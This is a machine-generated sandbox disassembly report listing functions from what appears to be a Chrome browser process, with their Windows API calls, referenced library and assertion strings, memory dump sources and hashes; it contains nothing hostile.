..\..\third_party\libc++\src\include\__string\char_traits.h:368: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 00007FF63EE7FE41

Memory Dump Source

Source File: 00000009.00000002.2301419267.00007FF63EDB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF63EDB0000, based on PE: true

Associated: 00000009.00000002.2301359970.00007FF63EDB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301567835.00007FF63EF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301625864.00007FF63EFE1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFE2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301692165.00007FF63EFF0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301728968.00007FF63EFFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301762596.00007FF63F00F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301790033.00007FF63F010000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301815948.00007FF63F011000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff63edb0000_chrome.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: ..\..\third_party\libc++\src\include\__string\char_traits.h:368: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$ProcessPrng$bcryptprimitives.dll
API String ID: 2574300362-3291573388
Opcode ID: 65123a38714a84464c80ae905ecb90bca6ea1113ffecb9f5a8c62a1e1695cf81
Instruction ID: 9e4efa04a7c94b1a89a61cfa67c0d79876faa945984bb70ed67e8e4a55c163ce
Opcode Fuzzy Hash: 65123a38714a84464c80ae905ecb90bca6ea1113ffecb9f5a8c62a1e1695cf81
Instruction Fuzzy Hash: 7351C262B0964655EB109B55E4442BA6351EF207A4F840635EE2D873E2DFBCF44EE320

Function 00007FF63EF36E80 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 00007FF63EF36F12
GetCurrentDirectoryW.KERNEL32 ref: 00007FF63EF36F4A
GetModuleFileNameW.KERNEL32 ref: 00007FF63EF36F94
CreateFileW.KERNEL32 ref: 00007FF63EF370B7

Strings

debug.log, xrefs: 00007FF63EF36FD6, 00007FF63EF3706E

Memory Dump Source

Source File: 00000009.00000002.2301419267.00007FF63EDB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF63EDB0000, based on PE: true

Associated: 00000009.00000002.2301359970.00007FF63EDB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301567835.00007FF63EF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301625864.00007FF63EFE1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFE2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301692165.00007FF63EFF0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301728968.00007FF63EFFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301762596.00007FF63F00F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301790033.00007FF63F010000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301815948.00007FF63F011000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff63edb0000_chrome.jbxd

Similarity

API ID: File$Create$CurrentDirectoryModuleName
String ID: debug.log
API String ID: 4120427848-600467936
Opcode ID: cc94403bba8ab4aaf74ab0589441cdb1841fba469a065eff5abc881bdcc3b7fb
Instruction ID: af583f3271575dea74ac8a48adeb182fd010e6fd3ac745f016923c245affb59b
Opcode Fuzzy Hash: cc94403bba8ab4aaf74ab0589441cdb1841fba469a065eff5abc881bdcc3b7fb
Instruction Fuzzy Hash: 0151EE61A08A4A80FB509B15E94437A26A0AFA0B94F00023DEA5D877E4DFBDF54DD320

Function 00007FF63EDBA7F0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 122COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32 ref: 00007FF63EDBA890
GetLastError.KERNEL32 ref: 00007FF63EDBA8CD
VirtualFree.KERNEL32 ref: 00007FF63EDBA901
TryAcquireSRWLockExclusive.KERNEL32 ref: 00007FF63EDBA91F

Strings

bitset reset argument out of range, xrefs: 00007FF63EDBA996

Memory Dump Source

Source File: 00000009.00000002.2301419267.00007FF63EDB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF63EDB0000, based on PE: true

Associated: 00000009.00000002.2301359970.00007FF63EDB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301567835.00007FF63EF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301625864.00007FF63EFE1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFE2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301692165.00007FF63EFF0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301728968.00007FF63EFFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301762596.00007FF63F00F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301790033.00007FF63F010000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301815948.00007FF63F011000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff63edb0000_chrome.jbxd

Similarity

API ID: FreeVirtual$AcquireErrorExclusiveLastLock
String ID: bitset reset argument out of range
API String ID: 2644420941-1934458321
Opcode ID: f7e52cc189422792dbb317894568e348f91569feadfa4bb189abe610655c444a
Instruction ID: 6102ceba5cd11a9337a0c5fc0b637f619e0490bf9cf274a287c4116bf6927a3b
Opcode Fuzzy Hash: f7e52cc189422792dbb317894568e348f91569feadfa4bb189abe610655c444a
Instruction Fuzzy Hash: F941E663F04A4642EF188B26E9043B57661EF64BE1F544238EF6E87BD4EE3CD1969310

Function 00007FF63EDB16D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 113COMMON

Download Yara Rule

APIs

TryAcquireSRWLockExclusive.KERNEL32 ref: 00007FF63EDB16FE
AcquireSRWLockExclusive.KERNEL32 ref: 00007FF63EDB181B
TryAcquireSRWLockExclusive.KERNEL32 ref: 00007FF63EDB1841
ReleaseSRWLockExclusive.KERNEL32 ref: 00007FF63EDB1860

Strings

..\..\third_party\libc++\src\include\array:234: assertion __n < _Size failed: out-of-bounds access in std::array<T, N>, xrefs: 00007FF63EDB180C

Memory Dump Source

Source File: 00000009.00000002.2301419267.00007FF63EDB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF63EDB0000, based on PE: true

Associated: 00000009.00000002.2301359970.00007FF63EDB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301567835.00007FF63EF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301625864.00007FF63EFE1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFE2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301692165.00007FF63EFF0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301728968.00007FF63EFFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301762596.00007FF63F00F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301790033.00007FF63F010000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301815948.00007FF63F011000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff63edb0000_chrome.jbxd

Similarity

API ID: ExclusiveLock$Acquire$Release
String ID: ..\..\third_party\libc++\src\include\array:234: assertion __n < _Size failed: out-of-bounds access in std::array<T, N>
API String ID: 1678258262-2696940747
Opcode ID: ee6e2f276654c37aa09745c40e87c15c73998335483e48628210d39002c2e087
Instruction ID: 18b33c38c9f337dcfb470ada4de35bca8aebdcd4e1432a47d83f32442161ed94
Opcode Fuzzy Hash: ee6e2f276654c37aa09745c40e87c15c73998335483e48628210d39002c2e087
Instruction Fuzzy Hash: C8419216F0A643E1EB158B2295046B967A1FFA5B80F544639EE0F87381EF7CA45ED320

Function 00007FF63EDD21F0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 96COMMON

Download Yara Rule

APIs

TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF63EDD2040), ref: 00007FF63EDD224D
ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF63EDD2040), ref: 00007FF63EDD2284
AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF63EDD2040), ref: 00007FF63EDD235C

Strings

..\..\base\threading\thread.cc, xrefs: 00007FF63EDD22F2
StopSoon, xrefs: 00007FF63EDD22EB

Memory Dump Source

Source File: 00000009.00000002.2301419267.00007FF63EDB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF63EDB0000, based on PE: true

Associated: 00000009.00000002.2301359970.00007FF63EDB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301567835.00007FF63EF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301625864.00007FF63EFE1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFE2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301692165.00007FF63EFF0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301728968.00007FF63EFFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301762596.00007FF63F00F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301790033.00007FF63F010000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301815948.00007FF63F011000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff63edb0000_chrome.jbxd

Similarity

API ID: ExclusiveLock$Acquire$Release
String ID: ..\..\base\threading\thread.cc$StopSoon
API String ID: 1678258262-4240870308
Opcode ID: adae8eaed9c8f3929d972e6dbba24974bb844d98e2392a8842137ea4cacb6c1d
Instruction ID: 3f9726d0e4b6f1f41124bc66b835bb7658ffc69e5094ac181e2b81fa5db00c14
Opcode Fuzzy Hash: adae8eaed9c8f3929d972e6dbba24974bb844d98e2392a8842137ea4cacb6c1d
Instruction Fuzzy Hash: B841AF39B09B0680EB109F25E94027A7760FFA8BD4F444236EA0D837A4DF7CE54AD720

Function 00007FF63EDCAFB0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32 ref: 00007FF63EDCB030
TryAcquireSRWLockExclusive.KERNEL32 ref: 00007FF63EDCB083
ReleaseSRWLockExclusive.KERNEL32 ref: 00007FF63EDCB098
AcquireSRWLockExclusive.KERNEL32 ref: 00007FF63EDCB0C5

Strings

..\..\third_party\libc++\src\include\vector:618: assertion !empty() failed: front() called on an empty vector, xrefs: 00007FF63EDCB0D4

Memory Dump Source

Source File: 00000009.00000002.2301419267.00007FF63EDB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF63EDB0000, based on PE: true

Associated: 00000009.00000002.2301359970.00007FF63EDB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301567835.00007FF63EF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301625864.00007FF63EFE1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFE2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301692165.00007FF63EFF0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301728968.00007FF63EFFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301762596.00007FF63F00F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301790033.00007FF63F010000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301815948.00007FF63F011000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff63edb0000_chrome.jbxd

Similarity

API ID: ExclusiveLock$Acquire$CounterPerformanceQueryRelease
String ID: ..\..\third_party\libc++\src\include\vector:618: assertion !empty() failed: front() called on an empty vector
API String ID: 743314926-3459903379
Opcode ID: 16955a0a67b4284a45ae63ecba8fb226d886b1e43b0c28b520e5f5a14cb563af
Instruction ID: 53dab9c67169e4d3da450f52e0ddcdcb4e12e46d90bb1d85b2c185d072a39451
Opcode Fuzzy Hash: 16955a0a67b4284a45ae63ecba8fb226d886b1e43b0c28b520e5f5a14cb563af
Instruction Fuzzy Hash: B8316B25B09B06C1EB608B15E48137A6761EBA5BC0F401536EA5E877A0CFBCE589E321

Function 00007FF63EEEE4F4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF63EEEE519
GetProcAddress.KERNEL32 ref: 00007FF63EEEE52F
FreeLibrary.KERNEL32 ref: 00007FF63EEEE556

Strings

CorExitProcess, xrefs: 00007FF63EEEE528
mscoree.dll, xrefs: 00007FF63EEEE510

Memory Dump Source

Source File: 00000009.00000002.2301419267.00007FF63EDB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF63EDB0000, based on PE: true

Associated: 00000009.00000002.2301359970.00007FF63EDB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301567835.00007FF63EF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301625864.00007FF63EFE1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFE2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301692165.00007FF63EFF0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301728968.00007FF63EFFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301762596.00007FF63F00F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301790033.00007FF63F010000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301815948.00007FF63F011000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff63edb0000_chrome.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 3d8f831ad9830d2732d543ec9a9fb229a8571fde764722e4756b6d07d78c1cc4
Instruction ID: a3d40ad614ba28feaa8810987c8a45d78bf8d99c198e72760b1e24dc29eb8398
Opcode Fuzzy Hash: 3d8f831ad9830d2732d543ec9a9fb229a8571fde764722e4756b6d07d78c1cc4
Instruction Fuzzy Hash: 65F06265B19F0681FB108B24E44433A6760EFA9761F541639E66E873F4DFBCD04CA720

Function 00007FF63EE963F0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 188fileCOMMON

Download Yara Rule

APIs

UnmapViewOfFile.KERNEL32 ref: 00007FF63EE96635

Strings

..\..\third_party\libc++\src\include\__string\char_traits.h:223: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 00007FF63EE9655C
..\..\third_party\libc++\src\include\optional:806: assertion this->has_value() failed: optional operator* called on a disengaged value, xrefs: 00007FF63EE966D3
SharedMemoryTracker, xrefs: 00007FF63EE96695

Memory Dump Source

Source File: 00000009.00000002.2301419267.00007FF63EDB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF63EDB0000, based on PE: true

Associated: 00000009.00000002.2301359970.00007FF63EDB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301567835.00007FF63EF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301625864.00007FF63EFE1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFE2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301692165.00007FF63EFF0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301728968.00007FF63EFFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301762596.00007FF63F00F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301790033.00007FF63F010000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301815948.00007FF63F011000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff63edb0000_chrome.jbxd

Similarity

API ID: FileUnmapView
String ID: ..\..\third_party\libc++\src\include\__string\char_traits.h:223: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$..\..\third_party\libc++\src\include\optional:806: assertion this->has_value() failed: optional operator* called on a disengaged value$SharedMemoryTracker
API String ID: 2564024751-4112981607
Opcode ID: 51ce343d0a928cb0aaf0b7d4ea45a56dca9be76953509fb2e22eb31b12226aa1
Instruction ID: 05e2911066a531d59ddfef2ffbe7dc203d46ce0936627605e36227971a5c9c6c
Opcode Fuzzy Hash: 51ce343d0a928cb0aaf0b7d4ea45a56dca9be76953509fb2e22eb31b12226aa1
Instruction Fuzzy Hash: 4171B461A09A4B95EB10DB55E4443B923A0BF60794F404636FA1D877E1DFBCF14EE320

Function 00007FF63EDBAC50 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 109libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32 ref: 00007FF63EDBACB8
GetProcAddress.KERNEL32 ref: 00007FF63EDBACCD

Strings

bcryptprimitives.dll, xrefs: 00007FF63EDBACB1
ProcessPrng, xrefs: 00007FF63EDBACC3

Memory Dump Source

Source File: 00000009.00000002.2301419267.00007FF63EDB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF63EDB0000, based on PE: true

Associated: 00000009.00000002.2301359970.00007FF63EDB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301567835.00007FF63EF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301625864.00007FF63EFE1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFE2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301692165.00007FF63EFF0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301728968.00007FF63EFFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301762596.00007FF63F00F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301790033.00007FF63F010000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301815948.00007FF63F011000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff63edb0000_chrome.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: ProcessPrng$bcryptprimitives.dll
API String ID: 2574300362-2667675608
Opcode ID: c3a113c6457ebe76e4fea8f36af787d4822eb4a85e01334098769ee2bae2c045
Instruction ID: c23806bdd0879678816f10ac0d57332e0fe65376d96ecbc9599faa5be46d30a2
Opcode Fuzzy Hash: c3a113c6457ebe76e4fea8f36af787d4822eb4a85e01334098769ee2bae2c045
Instruction Fuzzy Hash: B041D665E0CA4281FB109B25E8412B96760FFA4B90F445235FD4C833A4EF7DF58AE320

Function 00007FF63EE1C1E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 91COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32 ref: 00007FF63EE1C28C

Strings

GetCurrentDirectoryW, xrefs: 00007FF63EE1C21C
..\..\base\files\file_util_win.cc, xrefs: 00007FF63EE1C223
ScopedBlockingCall, xrefs: 00007FF63EE1C348

Memory Dump Source

Source File: 00000009.00000002.2301419267.00007FF63EDB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF63EDB0000, based on PE: true

Associated: 00000009.00000002.2301359970.00007FF63EDB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301567835.00007FF63EF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301625864.00007FF63EFE1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFE2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301692165.00007FF63EFF0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301728968.00007FF63EFFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301762596.00007FF63F00F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301790033.00007FF63F010000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301815948.00007FF63F011000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff63edb0000_chrome.jbxd

Similarity

API ID: CurrentDirectory
String ID: ..\..\base\files\file_util_win.cc$GetCurrentDirectoryW$ScopedBlockingCall
API String ID: 1611563598-3482229333
Opcode ID: fcab5a81ee8bff8e98b0a11fd3fd3c6aec3cb95b2c817cfb2fc15e9724453b3a
Instruction ID: 9e9258bea7d4416e1b385102963eeeaae6b3c0b5bb3210f0ff6e2b02208f1200
Opcode Fuzzy Hash: fcab5a81ee8bff8e98b0a11fd3fd3c6aec3cb95b2c817cfb2fc15e9724453b3a
Instruction Fuzzy Hash: 9C419E22A0CA8291FB209F65E8453EEA360FFA1B84F445031FA8D87755DEBCE189D710

Function 00007FF63EDB8B40 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 76COMMON

Download Yara Rule

APIs

TryAcquireSRWLockExclusive.KERNEL32 ref: 00007FF63EDB8B4D
ReleaseSRWLockExclusive.KERNEL32 ref: 00007FF63EDB8C0F

Strings

bitset test argument out of range, xrefs: 00007FF63EDB8C2F
bitset set argument out of range, xrefs: 00007FF63EDB8C3F

Memory Dump Source

Source File: 00000009.00000002.2301419267.00007FF63EDB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF63EDB0000, based on PE: true

Associated: 00000009.00000002.2301359970.00007FF63EDB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301567835.00007FF63EF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301625864.00007FF63EFE1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFE2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301692165.00007FF63EFF0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301728968.00007FF63EFFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301762596.00007FF63F00F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301790033.00007FF63F010000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301815948.00007FF63F011000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff63edb0000_chrome.jbxd

Similarity

API ID: ExclusiveLock$AcquireRelease
String ID: bitset set argument out of range$bitset test argument out of range
API String ID: 17069307-1976194836
Opcode ID: 1a69c0012976a3f6c2c5bac2d8d75807f7d27db3c128318bfa349482506f32d1
Instruction ID: 80341d7917dfc868dd704751e581580686547c0b4187ff62db5d8aec521bf644
Opcode Fuzzy Hash: 1a69c0012976a3f6c2c5bac2d8d75807f7d27db3c128318bfa349482506f32d1
Instruction Fuzzy Hash: CC21A8E6F0978741FE648A51F6147F96352DB707C0E404535EB4E93781EEACE48DA328

Function 00007FF63EDBFD50 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64libraryloaderCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF63EDBFD64
GetModuleHandleW.KERNEL32 ref: 00007FF63EDBFDD9
GetProcAddress.KERNEL32 ref: 00007FF63EDBFDE9

Strings

GetHandleVerifier, xrefs: 00007FF63EDBFDDF

Memory Dump Source

Source File: 00000009.00000002.2301419267.00007FF63EDB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF63EDB0000, based on PE: true

Associated: 00000009.00000002.2301359970.00007FF63EDB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301567835.00007FF63EF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301625864.00007FF63EFE1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFE2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301692165.00007FF63EFF0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301728968.00007FF63EFFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301762596.00007FF63F00F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301790033.00007FF63F010000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301815948.00007FF63F011000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff63edb0000_chrome.jbxd

Similarity

API ID: AddressErrorHandleLastModuleProc
String ID: GetHandleVerifier
API String ID: 4275029093-1090674830
Opcode ID: 14c04637d36a46182b46355d9e388197b0da94b569f1c2c093a343e92ee38453
Instruction ID: 82ec2ab85779a076d0cce701aea4b3fa29d78a3710b870932cd239888fca540f
Opcode Fuzzy Hash: 14c04637d36a46182b46355d9e388197b0da94b569f1c2c093a343e92ee38453
Instruction Fuzzy Hash: D2216F35F1AA0381EB159B61A8443791351EF64B80F444539EA0ED7390EFBDA49EF320

Function 00007FF63EDD0550 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 61COMMON

Download Yara Rule

APIs

TryAcquireSRWLockExclusive.KERNEL32 ref: 00007FF63EDD0562
ReleaseSRWLockExclusive.KERNEL32 ref: 00007FF63EDD05E9

Strings

bitset test argument out of range, xrefs: 00007FF63EDD05FF
bitset set argument out of range, xrefs: 00007FF63EDD060B

Memory Dump Source

Source File: 00000009.00000002.2301419267.00007FF63EDB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF63EDB0000, based on PE: true

Associated: 00000009.00000002.2301359970.00007FF63EDB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301567835.00007FF63EF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
